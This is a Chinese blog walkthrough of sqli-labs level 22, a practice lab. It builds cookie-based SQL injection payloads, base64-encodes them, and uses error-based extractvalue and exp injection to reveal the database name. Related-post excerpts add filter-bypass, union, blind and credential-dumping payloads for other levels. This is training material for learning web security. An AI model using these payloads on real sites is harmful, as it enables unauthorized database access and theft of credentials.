sqllab第二十二关通关笔记

最新推荐文章于 2024-07-25 14:12:59 发布
最新推荐文章于 2024-07-25 14:12:59 发布
阅读量216 收藏
点赞数 1
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136726387
版权
本文讲述了作者通过逐步分析和构造payload,利用cookie注入和base64编码对系统进行测试,成功实现错误注入并获取数据库名的过程,展示了攻击者在Web应用安全中的渗透尝试。
摘要由CSDN通过智能技术生成

知识点:

  • cookie注入
  • 报错注入

直接抓取对应的数据包,发现还是一个cookie注入

参数值被base64加密了

测试这里使用什么手段读取输入

构造payload:uname=1'

base64加密:MSc=

出现了hacker的页面,说明信息错误但是单引号没起作用

使用双引号试一下

构造payload:1"

base64加密:MSI=

出现了语法错误的报错信息,说明这里使用了双引号进行读取输入

测试是否可以进行错误注入

构造payload:1" or exp(710)#

base64加密:MSIgb3IgZXhwKDcxMCkj

成功回显exp()的错误信息

接下来获取数据库名

构造payload:1" or extractvalue(1,concat(0x7e,database(),0x7e))#

base64加密:MSIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkj

成功获取到了数据库名;收工

10

I_WORM
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
sqllab第二十通关笔记
I_WORM的博客
03-15 377
仔细看了一下历史包才发现点击登录的过程中是发了两个包的,首先登录时会发一个不带cookie的包,之后会再发送一个带cookie的post包;上面拦截到的是不带cookie的包,所以回显没任何信息;构造payload:1'+or+extractvalue(1,concat(0x7e,database(),0x7e))#通过放包发现是一个302跳转的响应包,页面只有一个 I Love Cookies;通过点击页面上方的按钮可以实现响应包的自动跳转,跳转后的页面也没有任何信息。成功获取了数据库名;
sqllab第二十七通关笔记
I_WORM的博客
03-17 402
构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1。构造payload:id=1'%09and%09exp(710)='1。经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测。构造payload:id=1'%09and%091='1。页面给出了提示,联合查询键字被过滤了,直接使用错误注入。页面成功回显出了相信息,说明绕过成功。构造payload:id=1''成功获取到了数据库名;
sqllab第二十七A通关笔记
I_WORM的博客
03-17 299
构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1。构造payload:id=0"%09uNion%09SElect%091,2,3%09"1。构造payload:id=1"%09and%091="1。经过测试发现这是一个双引号闭合。成功获取了数据库名和版本信息。页面成功回显除了输入内容。获取数据库名和版本信息。
sqllab第二十八通关笔记(附带28a)
I_WORM的博客
03-17 299
构造payload:id=0%27)union%09all%09select%091,database(),3%09=(%271。重新构造payload:id=0%27)union%09all%09select%091,2,3%09and1=(%271。构造payload:id=-1%27)union%09all%09select%091,2,3%09and1=(%271。页面成功回显了,但是内容不是输入信息,应该是他把-1进行绝对值处理了,导致显示了id=1的内容。好,尝试进行错误注入。
sqllab第二十一通关笔记
I_WORM的博客
03-15 303
构造payload:1') or extractvalue(1,concat(0x7e,database(),0x7e))#直接截取带有cookie的数据包,发现uname参数的值被加密了,%3d是等号,这应该是一个base64加密。base64加密:MScrb3IrMT0xIw==(可以再次进行url编码,=变为%3d;通过在线解码平台对数据进行解密发现是admin,这就对上了,确实是一个base64加密。根据得到的信息,重新构造payload:1')+or+1=1#感觉是没问题的,是不是+号的问题呢?
sqllab第二十五A通关笔记
I_WORM的博客
03-16 431
构造payload:id=1/0+union+select+1,version(),database()+--+构造payload:id=1/0+union+select+1,2,3+--+构造payload:id=1/0+oorr+exp(710)=1--+构造payload:id=1/0+oorr+1=1--+同理,可以获取数据库其他内容,这里不演示了,收工。发现没有任何的回显信息,说明这里不能用错误注入。发现成功运算了,这是一个数值型的注入。成功显示了内容,可以尝试错误注入。成功回显了输入的内容。
sqllab第二十三通关笔记
I_WORM的博客
03-15 358
成功注入,说明这里的输入读取是mysql_fetch_array("select 1,2,3 from 表 where id ='输入内容'")构造payload:id=0'+union+select+1,version(),database()+'出现了语法错误的界面,发现好像利用了mysql_fetch_array()进行输入读取。构造payload:id=0'+union+select+1,2,3+'构造payload:id=0'+or+1='1。成功爆出了语法错误,说明读取输入用到了单引号。
sqllab第二十六通关笔记
I_WORM的博客
03-16 409
构造payload:id='||extractvalue(1,concat(0x7e,database(),0x7e))='1。发现不行,报错了,换成其他的也不行(%0a %09 %0b %0c %0d %a0)想了半天没结果,不用空格的话没办法执行语句;看了别人的wp发现可以用||进行绕过。构造payload:id=’||exp(710)='1。好了,既然能够绕过入门规则了,下面就要开始获取数据了。构造payload:id=1'+oorr+1='1。构造payload:id='||1='1。
sqllab第二十六A通关笔记
I_WORM的博客
03-17 303
构造payload:id=0'||if((mid(database(),1,1)='a')1,0)='1。将正确页面中的信息放到过滤条件中,然后按照payload1进行排序得到了正确的数据库名。标记对应的标志位,然后设置payload1和payload2,模式和之前的卡一样。利用布尔注入只能够获取一些基本的数据,如数据库名、版本号、路径、用户等信息。构造payload:id=0'||if(1,1,0)='1。发现可以执行,说明这里可以进行bool盲注。得到对应的爆破数据,对爆破数据进行过滤。
松鼠大战1第G通关录像.mp4
09-16
松鼠大战1第G通关录像
松鼠大战1第F通关录像.mp4
09-15
松鼠大战1第F通关录像
松鼠大战1第E通关录像.mp4
09-14
松鼠大战1第E通关录像
deepseek-vl 论文阅读笔记
samoyan的博客,记录技术成长~
07-22 1225
我们的语言模型基于DeepSeek LLM(DeepSeek-AI,2024),其微设计大体遵循LLaMA(Touvron等,2023a,b)的设计,采用带有RMSNorm(Zhang和Sennrich,2019)函数的Pre-Norm结构,并使用SwiGLU(Shazeer,2020)作为前馈网络(FFN)的激活函数,中间层维度为8/3模型维度。此外,我们引入了一种新的“模态预热”策略。为了促进创新并支持广泛的应用需求,我们公开了两个版本的模型,分别为1.3B和7B,以满足不同计算能力的需求。
vite5+vue3开发阅读APP实战笔记20240725
Python私教
07-25 395
修改src/page/home/index.vue,使用组件和API。注意,这里无论是组件还是API,都不需要我们手动引入,我们配置了自动导入以后,vite会帮我们自动导入。创建 src/page/home/index.vue。修改 vite.config.js。修改vite.config.js。修改 src/main.js。修改src/App.vue。
Golang学习笔记20240725,Go语言基础语法
最新发布
Python私教
07-25 532
如果我们在遍历的时候,不想要key或者value,也可以用下划线替代,下划线叫做匿名变量。go语言里面的switch语句每个case天生就是独立的,不需要加break。指针可以直接对内存地址进行操作。使用*表示指针,使用&取地址。切片在go语言里面非常常用,因为其有动态扩展的特性。运行方式3:goland右键运行。使用加号可以对字符串进行拼接。
学习笔记-系统框图传递函数公式推导
weixin_45875994的博客
07-24 799
输出C(s)是前向路径(通过G(s))的输出与反馈路径(通过H(s))的输出之差(在负反馈系统中)。因此,我们可以写出以下系式:这里,G(s)R(s)是前向路径的输出,而G(s)H(s)C(s)是反馈路径的输出(注意,反馈路径的输出先经过H(s),再与前向路径的输出相减)。
sqlilabs第二十
07-28
sqlilabs第二十中,当我们输入正确的账户密码时,referer字段内容会显示在页面上。可以通过构造一个SQL语句来报错账户密码。具体的SQL语句如下:1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))# \[3\]。这个SQL语句会通过updatexml函数将用户名和密码连接起来,并将结果显示在referer字段中。 #### 引用[.reference_title] - *1* *2* *3* [详细sqli-labs(1-65)通关讲解](https://blog.csdn.net/m0_67401134/article/details/126066930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值